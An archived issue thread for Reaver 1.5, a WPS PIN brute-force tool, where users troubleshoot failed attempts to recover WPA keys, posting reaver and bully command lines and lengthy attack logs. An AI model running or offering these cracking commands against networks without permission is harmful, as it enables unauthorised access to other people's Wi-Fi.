Reaver 1.5 : Quitting after 20000 crack attempts

[GoogleCodeExporter]

A few things to consider before submitting an issue:

0. We write documentation for a reason, if you have not read it and are
having problems with Reaver these pages are required reading before
submitting an issue:
http://code.google.com/p/reaver-wps/wiki/HintsAndTips
http://code.google.com/p/reaver-wps/wiki/README
http://code.google.com/p/reaver-wps/wiki/FAQ
http://code.google.com/p/reaver-wps/wiki/SupportedWirelessDrivers
1. Reaver will only work if your card is in monitor mode.  If you do not
know what monitor mode is then you should learn more about 802.11 hacking
in linux before using Reaver.
2. Using Reaver against access points you do not own or have permission to
attack is illegal.  If you cannot answer basic questions (i.e. model
number, distance away, etc) about the device you are attacking then do not
post your issue here.  We will not help you break the law.
3. Please look through issues that have already been posted and make sure
your question has not already been asked here: http://code.google.com/p
/reaver-wps/issues/list
4. Often times we need packet captures of mon0 while Reaver is running to
troubleshoot the issue (tcpdump -i mon0 -s0 -w broken_reaver.pcap).  Issue
reports with pcap files attached will receive more serious consideration.

Answer the following questions for every issue submitted:

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

1. What operating system are you using (Linux is the only supported OS)?

2. Is your wireless card in monitor mode (yes/no)?

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

5. What is the entire command line string you are supplying to reaver?

6. Please describe what you think the issue is.

7. Paste the output from Reaver below.

Original issue reported on code.google.com by resa...@gmail.com on 21 Mar 2014 at 1:55

[GoogleCodeExporter]

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] p2_index set to 9998
[+] Pin count advanced: 19998. Max pin attempts: 20000
[+] 99.99% complete. Elapsed time: 0d9h36m59s.
[+] Estimated Remaining time: 0d0h0m4s
[+] Trying pin 12349997.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] p2_index set to 9999
[+] Pin count advanced: 19999. Max pin attempts: 20000
[+] Trying pin 12349998.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] p2_index set to 10000

[+] Pin count advanced: 20000. Max pin attempts: 20000
[+] Quitting after 20000 crack attempts
[-] Failed to recover WPA key
root@bt:~# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -e xxxxxxx -c 11 -L -S -vv

Original comment by resa...@gmail.com on 21 Mar 2014 at 2:19

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

no have Reaver 1.5 here....but try this:
reaver -i mon0 -b xx:xx:xx:xx:xx:xx -e xxxxxxx -a -c 11 -L -S -vv -g 10000000

Original comment by deltomaf...@gmail.com on 22 Mar 2014 at 1:23

[GoogleCodeExporter]

@ deltomaf...@gmail.com        thanks for your help & try to update your reaver 
1.4 to reaver 1.5 like this:

# svn checkout http://reaver-wps-fork.googlecode.com/svn/trunk/ 
reaver-wps-fork-read-only
# cd reaver-wps-fork-read-only/src
# ./configure# make distclean && ./configure #(you can skip this step if you 
never installed reaver before)
# make
# make install

i try the command with in 2hrs53m but the output is repeating like this:

root@bt:~# reaver -i mon0 -b xx:xx:xx:xx:xx:xx -a -e xxxxxx -c 11 -L -S -vv -g 
10000000

Reaver v1.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

..
..
..
..

] Pin count advanced: 11000. Max pin attempts: 10000000
[+] Trying pin 1234(nul.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Pin count advanced: 11000. Max pin attempts: 10000000
[+] 0.11% complete. Elapsed time: 0d2h53m22s.
[+] Trying pin 1234(nul.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Pin count advanced: 11000. Max pin attempts: 10000000
[+] Trying pin 1234(nul.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Pin count advanced: 11000. Max pin attempts: 10000000
[+] Trying pin 1234(nul.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Pin count advanced: 11000. Max pin attempts: 10000000
[+] Trying pin 1234(nul.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
^C
[+] Session saved.
root@bt:~# 

what happen the trying pin 1234(nul.  ?

Original comment by resa...@gmail.com on 22 Mar 2014 at 8:08

[GoogleCodeExporter]

downloaded, installed and tested here:
reaver -b a0:f3:c1:xx:xx:xx -a -S -N -vv -c 6 -i mon0 -w -L
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p1_index set to 4623
[+] Pin count advanced: 4623. Max pin attempts: 11000
[+] 42.03% complete. Elapsed time: 0d0h7m10s.
[+] Estimated Remaining time: 1d7h53m6s
[+] Trying pin 46185679.
[+] Sending EAPOL START request
^C
[+] Session saved.

the difference is 11000
so .... recommend downloading it again
and compile the Reaver, you may have a Revision different or with bug.

Original comment by deltomaf...@gmail.com on 23 Mar 2014 at 3:37

[GoogleCodeExporter]

also delete file in /usr/local/etc/reaver/0022B0xxxxxx.wpc

Original comment by deltomaf...@gmail.com on 23 Mar 2014 at 3:45

[GoogleCodeExporter]

@ deltomaf.... Very much appriciated for your support.
i'll try to re-install & the above command and we will see if the error / bug 
are fixed.

Original comment by resa...@gmail.com on 23 Mar 2014 at 6:05

[GoogleCodeExporter]

[deleted comment]

[GoogleCodeExporter]

This is the output for reaver 1.4 with the same issue : start 90% and quit @ 
99.99%

+] Quitting after 11000 crack attempts
[-] Failed to recover WPA key

root@bt:~# reaver -b xx:xx:xx:xx:xx:xx -a -s -w -vv -c xx -i mon0

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 11
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxx)
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 00110002
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[!] WARNING: Receive timeout occurred
+] Sending WSC NACK
[+] 90.96% complete @ 2014-03-25 00:08:43 (2 seconds/pin)
.
.
.
.
.
.
.
.

+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 99.99% complete @ 2014-03-25 16:30:45 (2 seconds/pin)
[+] Trying pin 00119986
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 00119986
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Quitting after 11000 crack attempts
[-] Failed to recover WPA key
root@bt:~# 

Original comment by resa...@gmail.com on 25 Mar 2014 at 2:51

[GoogleCodeExporter]

is the same AP/Router? may be protective...
do test with Bully and see if the same problem occurs.

Original comment by deltomaf...@gmail.com on 26 Mar 2014 at 1:55

[GoogleCodeExporter]

can i run bully in backtrack? how to install & start bully? sorry am new to 
linux.

Thanks in advance...

Original comment by resa...@gmail.com on 27 Mar 2014 at 4:41

[GoogleCodeExporter]

yes you can install 
Bully requires libpcap<dev> and libssl<dev>
http://code.google.com/p/bully/

Original comment by deltomaf...@gmail.com on 29 Mar 2014 at 12:49

[GoogleCodeExporter]

guys , pleaseee help me :(((
i install bully and do commands right !
but i get this ! :

root@Max:~# bully -b xx:xx:xx:xx:xx:xx -c 6 -T  mon0
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'mon0' to channel '6'
[!] Using '00:11:22:33:44:55' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '60:a4:4c:ee:cd:a4' on channel '6'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'milk' (xx:xx:xx:xx:xx:xx)
[X] The AP doesn't appear to be WPS enabled (no WPS IE)

Help me :(

Original comment by pooya.si...@gmail.com on 29 Sep 2014 at 4:58